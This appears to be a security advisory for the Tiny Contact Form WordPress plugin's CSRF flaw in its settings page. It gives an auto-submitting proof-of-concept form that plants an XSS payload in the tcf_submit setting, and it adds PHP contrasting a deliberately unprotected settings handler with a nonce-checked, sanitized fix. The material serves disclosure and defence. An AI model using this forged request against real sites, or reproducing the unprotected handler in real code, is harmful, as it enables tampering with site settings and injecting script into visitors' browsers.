wpexploit | Daniel Ruf | WPEX-ID:5FA5838E-4843-4D9C-9884-E3EBBF56FC6A
History: May 31, 2022 - 12:00 a.m.

Tiny Contact Form <= 0.7 - Arbitrary Settings Update via CSRF

2022-05-31 00:00:00
Daniel Ruf
75
csrf
arbitrary settings update
form security
cross site request forgery
security exploit

EPSS

0.001

Percentile

25.9%

The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack. Because the submitted values are also stored without sanitization, a forged request can plant script in settings that are later rendered on the site (see the tcf_submit field in the PoC below).

<form id="test" action="https://example.com/wp-admin/options-general.php?page=tiny-contact-form" method="POST">
    <input type="text" name="tcf_to_email" value="hacked">
    <input type="text" name="tcf_from_email" value="hacked">
    <input type="text" name="tcf_msg_ok" value="">
    <input type="text" name="tcf_msg_err" value="">
    <input type="text" name="tcf_submit" value=''"><img src=x onerror=alert(1)>''>
    <input type="text" name="tcf_subpre" value="">
    <input type="text" name="tcf_field_1" value="">
    <input type="text" name="tcf_field_2" value="">
    <input type="text" name="tcf_field_3" value="">
    <input type="text" name="tcf_field_4" value="">
    <input type="text" name="tcf_field_5" value="">
    <input type="text" name="tcf_captcha_label" value="">
    <input type="text" name="tcf_captcha2_question" value="">
    <input type="text" name="tcf_captcha2_answer" value="">
    <input type="text" name="tcf_css" value="">
    <input type="text" name="tcf_save" value="Änderungen speichern">
</form>
<script>
    document.getElementById("test").submit();
</script>
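As an added defender-side illustration (this is not Tiny Contact Form's own code), here is the missing check and its fix written as a WordPress settings handler: the vulnerable shape saves whatever arrives in the POST body, while the hardened shape binds the settings form to a nonce, verifies it with check_admin_referer(), checks the capability, and sanitizes each field before update_option(). Field names come from the PoC above; the option names and the function names tcf_save_settings_vulnerable / tcf_settings_form_hardened / tcf_save_settings_hardened are assumptions for this example.

```php
<?php
// Added illustration, not the plugin's code. Field names come from the
// advisory's PoC; option names and function names are assumed.

// Vulnerable shape: any POST that reaches the settings page is saved as-is.
// A form auto-submitted from a third-party page by a logged-in admin's
// browser passes this check, because nothing ties the request to the site.
function tcf_save_settings_vulnerable() {
    if ( isset( $_POST['tcf_save'] ) ) {
        update_option( 'tcf_to_email', $_POST['tcf_to_email'] );
        update_option( 'tcf_submit',   $_POST['tcf_submit'] ); // unsanitized: stored XSS risk
    }
}

// Hardened form: emit a nonce bound to one named action.
function tcf_settings_form_hardened() {
    echo '<form method="post">';
    wp_nonce_field( 'tcf_save_settings', 'tcf_nonce' );
    echo '<input type="email" name="tcf_to_email" value="'
        . esc_attr( get_option( 'tcf_to_email', '' ) ) . '">';
    echo '<input type="text" name="tcf_submit" value="'
        . esc_attr( get_option( 'tcf_submit', 'Send' ) ) . '">';
    echo '<input type="submit" name="tcf_save" value="Save Changes">';
    echo '</form>';
}

// Hardened handler: capability check, nonce check, then sanitization.
function tcf_save_settings_hardened() {
    if ( ! isset( $_POST['tcf_save'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Dies with "The link you followed has expired." when tcf_nonce is missing
    // or invalid, so a cross-site POST never reaches update_option().
    check_admin_referer( 'tcf_save_settings', 'tcf_nonce' );

    $to_email = sanitize_email( wp_unslash( $_POST['tcf_to_email'] ?? '' ) );
    if ( is_email( $to_email ) ) {
        update_option( 'tcf_to_email', $to_email );
    }
    // sanitize_text_field() strips tags, so a "><img onerror=...> payload is
    // reduced to plain text before it is stored.
    update_option( 'tcf_submit', sanitize_text_field( wp_unslash( $_POST['tcf_submit'] ?? '' ) ) );
}
add_action( 'admin_init', 'tcf_save_settings_hardened' );
```

When reviewing a plugin for this class of bug, look for update_option() calls in a request handler with no check_admin_referer() or wp_verify_nonce() on the same path; the nonce must be checked on every save, not only when rendering the form.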
